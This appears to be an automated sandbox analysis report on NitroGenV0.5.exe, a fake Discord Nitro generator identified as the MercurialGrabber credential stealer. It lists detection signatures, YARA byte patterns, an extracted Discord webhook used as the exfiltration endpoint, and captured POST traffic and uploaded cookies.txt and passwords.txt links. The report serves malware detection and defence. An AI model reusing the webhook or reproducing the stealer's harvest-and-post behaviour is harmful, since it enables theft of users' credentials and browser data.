Loading ...

Play interactive tourEdit tour

Windows Analysis Report https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe

Overview

General Information

Sample URL:https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Analysis ID:517177
Infos:

Most interesting Screenshot:

Detection

MercurialGrabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected MercurialGrabber
Antivirus detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
PE file contains strange resources
Drops PE files
Contains capabilities to detect virtual machines
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6988 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wget.exe (PID: 7096 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • NitroGenV0.5.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\download\NitroGenV0.5.exe" MD5: B4A34AC1A572E23168B2C6803780FE7E)
    • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • NitroGenV0.5.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe" MD5: B4A34AC1A572E23168B2C6803780FE7E)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: MercurialGrabber

{"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\download\NitroGenV0.5.exeJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
    C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
      C:\Users\user\Desktop\download\NitroGenV0.5.exeMAL_Luna_Stealer_Apr_2021_1Detect Luna stealer (also Mercurial Grabber)Arkbird_SOLG
      • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
      • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
      • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
      • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
      • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...
      C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeMAL_Luna_Stealer_Apr_2021_1Detect Luna stealer (also Mercurial Grabber)Arkbird_SOLG
      • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
      • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
      • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
      • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
      • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmpJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
        00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmpJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
          00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmpJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
            00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmpJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
              Process Memory Space: NitroGenV0.5.exe PID: 6784JoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                6.2.NitroGenV0.5.exe.8e0000.0.unpackJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                  17.0.NitroGenV0.5.exe.510000.0.unpackJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                    6.0.NitroGenV0.5.exe.8e0000.0.unpackJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                      6.2.NitroGenV0.5.exe.8e0000.0.unpackMAL_Luna_Stealer_Apr_2021_1Detect Luna stealer (also Mercurial Grabber)Arkbird_SOLG
                      • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
                      • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
                      • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
                      • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
                      • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...
                      17.2.NitroGenV0.5.exe.510000.0.unpackJoeSecurity_MercurialGrabberYara detected MercurialGrabberJoe Security
                        Click to see the 3 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
                        Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , CommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wget.exe, NewProcessName: C:\Windows\SysWOW64\wget.exe, OriginalFileName: C:\Windows\SysWOW64\wget.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ProcessCommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , ProcessId: 7096

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpackMalware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}
                        Yara detected MercurialGrabberShow sources
                        Source: Yara matchFile source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
                        Antivirus detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeAvira: detection malicious, Label: HEUR/AGEN.1143801
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeAvira: detection malicious, Label: HEUR/AGEN.1143801
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BBB20E CryptUnprotectData,6_2_00007FFC08BBB20E
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BBB241 CryptUnprotectData,6_2_00007FFC08BBB241
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BBB25E CryptUnprotectData,6_2_00007FFC08BBB25E
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC0893AD7A CryptUnprotectData,17_2_00007FFC0893AD7A
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC0893B25E CryptUnprotectData,17_2_00007FFC0893B25E

                        Compliance:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeUnpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeUnpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
                        Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

                        Networking:

                        barindex
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 704Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 704Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
                        Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp, NitroGenV0.5.exe, 00000006.00000002.304401796.000000001BBE5000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.351164827.000000001C910000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: http://discord.com
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350437000.00000000027D9000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: http://ip-api.com//json/
                        Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com//json/84.17.52.68
                        Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.comx
                        Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmpString found in binary or memory: http://ip4.seeip.org
                        Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: wget.exe, wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/Ni
                        Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmp, cmdline.out.1.drString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
                        Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe$
                        Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe0
                        Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe9
                        Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe;
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810248877211688/cookies.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810251381211176/passwords.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810260252164166/Capture.jpg
